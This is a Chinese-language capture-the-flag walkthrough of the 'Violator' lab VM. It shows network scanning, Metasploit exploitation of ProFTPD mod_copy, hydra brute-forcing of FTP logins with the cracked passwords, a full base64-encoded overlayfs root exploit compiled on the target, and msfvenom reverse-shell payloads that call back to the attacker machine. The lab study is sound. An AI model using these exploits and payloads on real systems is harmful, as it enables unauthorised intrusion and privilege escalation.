• Write-up-Violator


    关于

    • 下载地址:点我
    • Flag:/root/flag.txt
    • 哔哩哔哩:视频

    信息收集

    • 网卡:虚拟机vmnet8
    ➜  ~ ip addr show dev vmnet8 
    5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
        link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
        inet 172.16.249.1/24 brd 172.16.249.255 scope global vmnet8
           valid_lft forever preferred_lft forever
        inet6 fe80::250:56ff:fec0:8/64 scope link 
           valid_lft forever preferred_lft forever
    
    ➜  ~ nmap -T4 -A 172.16.249.1/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 08:09 CST
    Nmap scan report for 172.16.249.1
    Host is up (0.00013s latency).
    Not shown: 999 closed ports
    PORT    STATE SERVICE         VERSION
    902/tcp open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
    
    Nmap scan report for 172.16.249.129
    Host is up (0.00035s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     ProFTPD 1.3.5rc3
    80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
    Service Info: OS: Unix
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 256 IP addresses (2 hosts up) scanned in 72.25 seconds
    
    1. IP:172.16.249.129,Ubuntu开放端口21和80。主页里有一张图片和一个wiki的链接,可能是突破口。
    ➜  ~ curl -L http://172.16.249.129/
    <html>
    <title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
      <body>
        <br>I Say.. I say... I say boy!  You're barkin up the wrong tree!</br>
        <img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
       <-- https://en.wikipedia.org/wiki/Violator_(album)  -->
      </body>
    </html>
    
    
    • 不是WordPress框架,还是用nikto扫一下吧,什么也没发现,看了foggie.jpg的exif信息也没发现。
    ➜  ~ nikto -h http://172.16.249.129/
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          172.16.249.129
    + Target Hostname:    172.16.249.129
    + Target Port:        80
    + Start Time:         2018-08-06 08:16:20 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.7 (Ubuntu)
    + Server leaks inodes via ETags, header found with file /, fields: 0x13e 0x53518115c6709 
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
    + OSVDB-3233: /icons/README: Apache default file found.
    + 7535 requests: 0 error(s) and 7 item(s) reported on remote host
    + End Time:           2018-08-06 08:16:28 (GMT8) (8 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    1. 所以目标转向了FTP,在nmap的返回结果中可看到ProFTPD 1.3.5rc3,找相关版本是否存在漏洞。
    ➜  ~ searchsploit ProFTPD 1.3.5
    -------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
     Exploit Title                                                                                                            |  Path
                                                                                                                              | (/home/kali-team/Kali-Team/exploit-database/)
    -------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
    ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                 | exploits/linux/remote/37262.rb
    ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                       | exploits/linux/remote/36803.py
    ProFTPd 1.3.5 - File Copy                                                                                                 | exploits/linux/remote/36742.txt
    -------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
    

    漏洞利用

    • 三个漏洞都可以利用,这里使用第一个Metasploit框架中的,比较方便。
    msf > use exploit/unix/ftp/proftpd_modcopy_exec 
    msf exploit(unix/ftp/proftpd_modcopy_exec) > show options 
    
    Module options (exploit/unix/ftp/proftpd_modcopy_exec):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOST                       yes       The target address
       RPORT      80               yes       HTTP port (TCP)
       RPORT_FTP  21               yes       FTP port
       SITEPATH   /var/www         yes       Absolute writable website path
       SSL        false            no        Negotiate SSL/TLS for outgoing connections
       TARGETURI  /                yes       Base path to the website
       TMPPATH    /tmp             yes       Absolute writable path
       VHOST                       no        HTTP server virtual host
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   ProFTPD 1.3.5
    
    
    msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost 172.16.249.129
    rhost => 172.16.249.129
    msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
    sitepath => /var/www/html
    msf exploit(unix/ftp/proftpd_modcopy_exec) > run 
    
    [*] Started reverse TCP handler on 172.16.249.1:4444 
    [*] 172.16.249.129:80 - 172.16.249.129:21 - Connected to FTP server
    [*] 172.16.249.129:80 - 172.16.249.129:21 - Sending copy commands to FTP server
    [*] 172.16.249.129:80 - Executing PHP payload /O8hgrL.php
    [*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.129:33406) at 2018-08-06 14:10:35 +0800
    
    ls
    O8hgrL.php
    foggie.jpg
    i0KEqK.php
    index.html
    
    • 系统是Ubuntu,所以路径设置为/var/www/html,目录下的两个PHP文件就是Metasploit生成的后门。
    whoami
    www-data
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    messagebus:x:102:106::/var/run/dbus:/bin/false
    landscape:x:103:109::/var/lib/landscape:/bin/false
    dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
    proftpd:x:104:65534::/var/run/proftpd:/bin/false
    ftp:x:105:65534::/srv/ftp:/bin/false
    mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
    af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
    aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
    uname -a
    Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    
    • 发现有几个用户名dg mg af aw,上传到服务器试了,有提权漏洞,但www-data不能用sudo。
    www-data@violator:/var/www/html$ cat /etc/group
    cat /etc/group
    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:syslog,dg
    tty:x:5:
    disk:x:6:
    lp:x:7:
    mail:x:8:
    news:x:9:
    uucp:x:10:
    man:x:12:
    proxy:x:13:
    kmem:x:15:
    dialout:x:20:
    fax:x:21:
    voice:x:22:
    cdrom:x:24:dg
    floppy:x:25:
    tape:x:26:
    sudo:x:27:dg
    audio:x:29:
    dip:x:30:dg
    www-data:x:33:
    backup:x:34:
    operator:x:37:
    list:x:38:
    irc:x:39:
    src:x:40:
    gnats:x:41:
    shadow:x:42:
    utmp:x:43:
    video:x:44:
    sasl:x:45:
    plugdev:x:46:dg
    staff:x:50:
    games:x:60:
    users:x:100:mg,af,aw
    nogroup:x:65534:
    libuuid:x:101:
    netdev:x:102:
    crontab:x:103:
    syslog:x:104:
    fuse:x:105:
    messagebus:x:106:
    mlocate:x:107:
    ssh:x:108:
    landscape:x:109:
    dg:x:1000:
    lpadmin:x:110:dg
    sambashare:x:111:dg
    ssl-cert:x:112:
    mg:x:1001:
    af:x:1002:
    aw:x:1003:
    
    • 能sudo的只有dg一个用户,去翻一下各个用户的home目录。然后找到下面的信息。
    www-data@violator:/home/af$ ls
    ls
    minarke-1.21  minarke-1.21.tar.bz2
    www-data@violator:/home/aw$ file hint
    file hint
    hint: ASCII text
    www-data@violator:/home/aw$ cat hint
    cat hint
    You are getting close... Can you crack the final enigma..?
    www-data@violator:/home/aw$ 
    www-data@violator:/home$ ls dg
    ls dg
    bd
    www-data@violator:/home/mg$ file faith_and_devotion
    file faith_and_devotion
    faith_and_devotion: ASCII text
    www-data@violator:/home/mg$ cat faith_and_devotion
    cat faith_and_devotion
    Lyrics:
    
    * Use Wermacht with 3 rotors
    * Reflector to B
    Initial: A B C
    Alphabet Ring: C B A
    Plug Board A-B, C-D
    
    www-data@violator:/home/mg$ 
    
    
    • 全部复制到/var/www/html下载会本地。思路断了,外国的东西看不懂。然后看会了前期发现的wiki。想到了用CeWL把wiki的单词爬下来当字典,爆破那四个用户。CeWL的说明介绍。我其实是把专辑和歌名那一部分去掉空格作为密码字典的。

    CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

    ➜  CeWL git:(master) ✗ ./cewl.rb -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w pass.txt
    ➜  CeWL git:(master) ✗ cat pass.txt |wc -l
    10429
    ➜  CeWL git:(master) ✗ hydra -L user.txt -P pass.txt -u 172.16.249.129 ftp
    Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:56:59
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 92 login tries (l:4/p:23), ~6 tries per task
    [DATA] attacking ftp://172.16.249.129:21/
    [21][ftp] host: 172.16.249.129   login: aw   password: sweetestperfection
    [21][ftp] host: 172.16.249.129   login: af   password: enjoythesilence
    [21][ftp] host: 172.16.249.129   login: mg   password: bluedress
    [21][ftp] host: 172.16.249.129   login: dg   password: policyoftruth
    ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
    ➜  CeWL git:(master) ✗ 
    

    提权

    1. 第一种时直接上exp,因为msf拿到的shell没有上传功能,一句话木马好像也不行。所以先把exp.c转为base64,再写到shell里,到了服务器那边再解码成exp.c,然后编译执行。
    ➜  ~ searchsploit -p 39166
      Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
          URL: https://www.exploit-db.com/exploits/39166/
         Path: /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c
    File Type: C source, ASCII text, with CRLF line terminators
    
    ➜  ~ cp /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c exp.c 
    ➜  ~ cat exp.c|base64 
    LyoNCmp1c3QgYW5vdGhlciBvdmVybGF5ZnMgZXhwbG9pdCwgd29ya3Mgb24ga2VybmVscyBiZWZv
    cmUgMjAxNS0xMi0yNg0KDQojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290DQoj
    IERhdGU6IDIwMTYtMDEtMDUNCiMgRXhwbG9pdCBBdXRob3I6IHJlYmVsDQojIFZlcnNpb246IFVi
    dW50dSAxNC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlDQojIFRlc3RlZCBvbjogVWJ1bnR1IDE0LjA0
    IExUUywgMTUuMTANCiMgQ1ZFIDogQ1ZFLTIwMTUtODY2MA0KDQpibGFoQHVidW50dTp+JCBpZA0K
    dWlkPTEwMDEoYmxhaCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTEwMDEoYmxhaCkNCmJsYWhAdWJ1
    bnR1On4kIHVuYW1lIC1hICYmIGNhdCAvZXRjL2lzc3VlDQpMaW51eCB1YnVudHUgMy4xOS4wLTQy
    LWdlbmVyaWMgIzQ4fjE0LjA0LjEtVWJ1bnR1IFNNUCBGcmkgRGVjIDE4IDEwOjI0OjQ5IFVUQyAy
    MDE1IHg4Nl82NCB4ODZfNjQgeDg2XzY0IEdOVS9MaW51eA0KVWJ1bnR1IDE0LjA0LjMgTFRTIFxu
    IFxsDQpibGFoQHVidW50dTp+JCAuL292ZXJsYXlmYWlsDQpyb290QHVidW50dTp+IyBpZA0KdWlk
    PTAocm9vdCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTAocm9vdCksMTAwMShibGFoKQ0KDQoxMi8y
    MDE1DQpieSByZWJlbA0KDQo2MzU0YjRlMjNkYjIyNWI1NjVkNzlmMjI2ZjJlNDllYzBmZTFlMTli
    DQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzY2hlZC5oPg0KI2luY2x1ZGUg
    PHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5j
    bHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMv
    bW91bnQuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1
    ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQuaD4N
    CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvbW91bnQuaD4NCiNpbmNsdWRl
    IDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzaWduYWwuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0K
    I2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPGxpbnV4L3NjaGVkLmg+DQojaW5jbHVkZSA8
    c3lzL3dhaXQuaD4NCg0Kc3RhdGljIGNoYXIgY2hpbGRfc3RhY2tbMTAyNCoxMDI0XTsNCg0Kc3Rh
    dGljIGludA0KY2hpbGRfZXhlYyh2b2lkICpzdHVmZikNCnsNCiAgICBzeXN0ZW0oInJtIC1yZiAv
    dG1wL2hheGhheCIpOw0KICAgIG1rZGlyKCIvdG1wL2hheGhheCIsIDA3NzcpOw0KICAgIG1rZGly
    KCIvdG1wL2hheGhheC93IiwgMDc3Nyk7DQogICAgbWtkaXIoIi90bXAvaGF4aGF4L3UiLDA3Nzcp
    Ow0KICAgIG1rZGlyKCIvdG1wL2hheGhheC9vIiwwNzc3KTsNCg0KICAgIGlmIChtb3VudCgib3Zl
    cmxheSIsICIvdG1wL2hheGhheC9vIiwgIm92ZXJsYXkiLCBNU19NR0NfVkFMLCAibG93ZXJkaXI9
    L2Jpbix1cHBlcmRpcj0vdG1wL2hheGhheC91LHdvcmtkaXI9L3RtcC9oYXhoYXgvdyIpICE9IDAp
    IHsNCglmcHJpbnRmKHN0ZGVyciwibW91bnQgZmFpbGVkLi5cbiIpOw0KICAgIH0NCg0KICAgIGNo
    bW9kKCIvdG1wL2hheGhheC93L3dvcmsiLDA3NzcpOw0KICAgIGNoZGlyKCIvdG1wL2hheGhheC9v
    Iik7DQogICAgY2htb2QoImJhc2giLDA0NzU1KTsNCiAgICBjaGRpcigiLyIpOw0KICAgIHVtb3Vu
    dCgiL3RtcC9oYXhoYXgvbyIpOw0KICAgIHJldHVybiAwOw0KfQ0KDQppbnQNCm1haW4oaW50IGFy
    Z2MsIGNoYXIgKiphcmd2KQ0Kew0KICAgIGludCBzdGF0dXM7DQogICAgcGlkX3Qgd3JhcHBlciwg
    aW5pdDsNCiAgICBpbnQgY2xvbmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7DQogICAg
    c3RydWN0IHN0YXQgczsNCg0KICAgIGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7DQogICAg
    ICAgIGlmKHVuc2hhcmUoQ0xPTkVfTkVXVVNFUikgIT0gMCkNCiAgICAgICAgICAgIGZwcmludGYo
    c3RkZXJyLCAiZmFpbGVkIHRvIGNyZWF0ZSBuZXcgdXNlciBuYW1lc3BhY2VcbiIpOw0KDQogICAg
    ICAgIGlmKChpbml0ID0gZm9yaygpKSA9PSAwKSB7DQogICAgICAgICAgICBwaWRfdCBwaWQgPQ0K
    ICAgICAgICAgICAgICAgIGNsb25lKGNoaWxkX2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAy
    NCksIGNsb25lX2ZsYWdzLCBOVUxMKTsNCiAgICAgICAgICAgIGlmKHBpZCA8IDApIHsNCiAgICAg
    ICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVhdGUgbmV3IG1vdW50IG5h
    bWVzcGFjZVxuIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgICAgICB9DQoN
    CiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVzLCAwKTsNCg0KICAgICAgICB9DQoNCiAg
    ICAgICAgd2FpdHBpZChpbml0LCAmc3RhdHVzLCAwKTsNCiAgICAgICAgcmV0dXJuIDA7DQogICAg
    fQ0KDQogICAgdXNsZWVwKDMwMDAwMCk7DQoNCiAgICB3YWl0KE5VTEwpOw0KDQogICAgc3RhdCgi
    L3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7DQoNCiAgICBpZihzLnN0X21vZGUgPT0gMHg4OWVkKQ0K
    ICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwiLWMiLCJybSAt
    cmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3VpZCgwLDAsMCk7
    b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7DQoNCiAgICBmcHJpbnRmKHN0
    ZGVyciwiY291bGRuJ3QgY3JlYXRlIHN1aWQgOihcbiIpOw0KICAgIHJldHVybiAtMTsNCn0=
    ➜  ~ 
    
    
    • 在服务器这边把base64解码
    dg@violator:/var/www/html$ cat exp.txt|base64 -d >exp.c
    cat exp.txt|base64 -d >exp.c
    
    dg@violator:/var/www/html$ gcc exp.c
    gcc exp.c
    dg@violator:/var/www/html$ ls
    ls
    a.out  exp.c  exp.txt  J0dov8.php  jc7gX.php  vMZTOjJ.php
    dg@violator:/var/www/html$ ./a.out
    ./a.out
    root@violator:/var/www/html# id
    id
    uid=0(root) gid=1000(dg) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(dg)
    root@violator:/var/www/html# 
    
    1. 第二种提权的方法,用用户名:dg密码:policyoftruth登上FTP,切换的/var/www/html然后上传Meterpreter-shell。
    • 生成meterpreter-shell,FTP上传直接PUT就可以了
    ➜  ~ msfvenom -p  php/meterpreter_reverse_tcp LPORT=7788 LHOST=172.16.249.1 -f raw -o msf.php
    msf > use exploit/multi/handler 
    msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
    payload => php/meterpreter_reverse_tcp
    msf exploit(multi/handler) > set lport 7788
    lport => 7788
    msf exploit(multi/handler) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 172.16.249.1:7788 
    [*] Meterpreter session 1 opened (172.16.249.1:7788 -> 172.16.249.129:35623) at 2018-08-07 20:36:38 +0800
    
    • 这个功能比较多,我平时也是用这个payload的。
    www-data@violator:/var/www/html$ su dg
    su dg
    Password: policyoftruth
    
    dg@violator:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for dg on violator:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    
    User dg may run the following commands on violator:
        (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
    dg@violator:/var/www/html$ 
    
    • 上面可以看到proftpd这个守护进程是以root权限运行的,而这东西又刚刚好有漏洞。而且执行不要root密码。我们切换到/home/dg/bd/sbin/proftpd把proftpd以root权限执行起来。接着就是去利用漏洞了。
    dg@violator:/var/www/html$ cd /home/dg/bd/sbin/
    cd /home/dg/bd/sbin/
    dg@violator:~/bd/sbin$ ls
    ls
    ftpscrub  ftpshut  in.proftpd  proftpd
    dg@violator:~/bd/sbin$ ls -al
    ls -al
    total 564
    drwxr-xr-x  2 root root   4096 Jun  6  2016 .
    drwxr-xr-x 10 root root   4096 Jun  6  2016 ..
    -rwxr-xr-x  1 root root  15976 Jun  6  2016 ftpscrub
    -rwxr-xr-x  1 root root  10456 Jun  6  2016 ftpshut
    lrwxrwxrwx  1 root root      7 Jun  6  2016 in.proftpd -> proftpd
    -rwxr-xr-x  1 root root 537488 Jun  6  2016 proftpd
    dg@violator:~/bd/sbin$ sudo ./proftpd
    sudo ./proftpd
     - setting default address to 127.0.0.1
    localhost - SocketBindTight in effect, ignoring DefaultServer
    dg@violator:~/bd/sbin$ 
    dg@violator:~/bd/sbin$ netstat -antp
    netstat -antp
    (Not all processes could be identified, non-owned process info
     will not be shown, you would have to be root to see it all.)
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -               
    tcp        0      0 172.16.249.129:60704    172.16.249.1:4444       CLOSE_WAIT  -               
    tcp        0      0 172.16.249.129:60705    172.16.249.1:4444       CLOSE_WAIT  -               
    tcp        0      0 172.16.249.129:35623    172.16.249.1:7788       ESTABLISHED 2669/bash       
    tcp6       0      0 :::21                   :::*                    LISTEN      -               
    tcp6       0      0 :::80                   :::*                    LISTEN      -               
    tcp6       0      0 172.16.249.129:80       172.16.249.1:51132      ESTABLISHED -               
    dg@violator:~/bd/sbin$ 
    
    • 现在守护进程已经跑起来了,监听的端口是2121,但是只能由127.0.0.1访问,所以要做端口转发。
    meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
    [*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121
    
    meterpreter > background 
    [*] Backgrounding session 1...
    msf exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
    set payload cmd/unix/bind_perl
    set payload cmd/unix/bind_perl_ipv6
    set payload cmd/unix/generic
    set payload cmd/unix/reverse
    set payload cmd/unix/reverse_bash_telnet_ssl
    set payload cmd/unix/reverse_perl
    set payload cmd/unix/reverse_perl_ssl
    set payload cmd/unix/reverse_ssl_double_telnet
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
    payload => cmd/unix/reverse_perl
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(unix/ftp/proftpd_133c_backdoor) > show options 
    
    Module options (exploit/unix/ftp/proftpd_133c_backdoor):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/reverse_perl):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  172.16.249.1     yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf exploit(unix/ftp/proftpd_133c_backdoor) > run 
    
    [-] Exploit failed: The following options failed to validate: RHOST.
    [*] Exploit completed, but no session was created.
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121
    rport => 2121
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1
    rhost => 127.0.0.1
    msf exploit(unix/ftp/proftpd_133c_backdoor) > run 
    [*] Started reverse TCP handler on 172.16.249.1:4444 
    [*] 127.0.0.1:2121 - Sending Backdoor Command
    [*] Command shell session 2 opened (172.16.249.1:4444 -> 172.16.249.129:60709) at 2018-08-07 21:05:32 +0800
    
    id
    uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
    
    • 那到root权限了,接下来去夺旗。
    python -c 'import pty;pty.spawn("/bin/bash")'
    root@violator:/# ls
    ls
    bin   dev  home        lib    lost+found  mnt  proc  run   srv  tmp  var
    boot  etc  initrd.img  lib64  media       opt  root  sbin  sys  usr  vmlinuz
    root@violator:/# cd /root
    cd /root
    root@violator:/root# ls
    ls
    flag.txt
    root@violator:/root# cat flag.txt
    cat flag.txt
    I say... I say... I say boy! Pumping for oil or something...?
    ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
    root@violator:/root# 
    
    

    彩蛋

    • 在root目录下有一个隐藏文件夹,下载回来看看发现有密码。
    root@violator:/root# ll
    ll
    total 24
    drwx------  3 root root 4096 Jun 14  2016 ./
    drwxr-xr-x 22 root root 4096 Jun 14  2016 ../
    -rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
    d--x------  2 root root 4096 Jun 14  2016 .basildon/
    -rw-r--r--  1 root root  114 Jun 12  2016 flag.txt
    -rw-r--r--  1 root root  140 Feb 20  2014 .profile
    root@violator:/root# cd .basildon/
    cd .basildon/
    root@violator:/root/.basildon# ls
    ls
    crocs.rar
    root@violator:/root/.basildon# 
    
    ➜  DOWNLOAD john hash --wordlist=/home/kali-team/Kali-Team/password-recovery/CeWL/pass
    Warning: detected hash type "rar", but the string is also recognized as "rar-opencl"
    Use the "--format=rar-opencl" option to force loading these as that type instead
    Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    World in My Eyes (crocs.rar)
    1g 0:00:00:00 DONE (2018-08-07 21:20) 3.703g/s 88.88p/s 88.88c/s 88.88C/s enjoythesilence..World in My Eyes
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    
    
    • 密码破解出来是World in My Eyes,别问我怎么知道的,情节需要。现在到隐写
    ➜  DOWNLOAD exiftool artwork.jpg
    ExifTool Version Number         : 11.01
    File Name                       : artwork.jpg
    Directory                       : .
    File Size                       : 183 kB
    File Modification Date/Time     : 2016:06:12 14:38:12+08:00
    File Access Date/Time           : 2018:08:07 21:23:12+08:00
    File Inode Change Date/Time     : 2018:08:07 21:23:12+08:00
    File Permissions                : rw-r--r--
    File Type                       : JPEG
    File Type Extension             : jpg
    MIME Type                       : image/jpeg
    JFIF Version                    : 1.01
    Resolution Unit                 : inches
    X Resolution                    : 300
    Y Resolution                    : 300
    Exif Byte Order                 : Big-endian (Motorola, MM)
    Image Description               : Violator
    Software                        : Google
    Artist                          : Dave Gaham
    Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Exif Version                    : 0220
    Date/Time Original              : 1990:03:19 22:13:30
    Create Date                     : 1990:03:19 22:13:30
    Sub Sec Time Original           : 04
    Sub Sec Time Digitized          : 04
    Exif Image Width                : 1450
    Exif Image Height               : 1450
    XP Title                        : Violator
    XP Author                       : Dave Gaham
    XP Keywords                     : created by user dg
    XP Subject                      : policyoftruth
    Padding                         : (Binary data 1590 bytes, use -b option to extract)
    About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
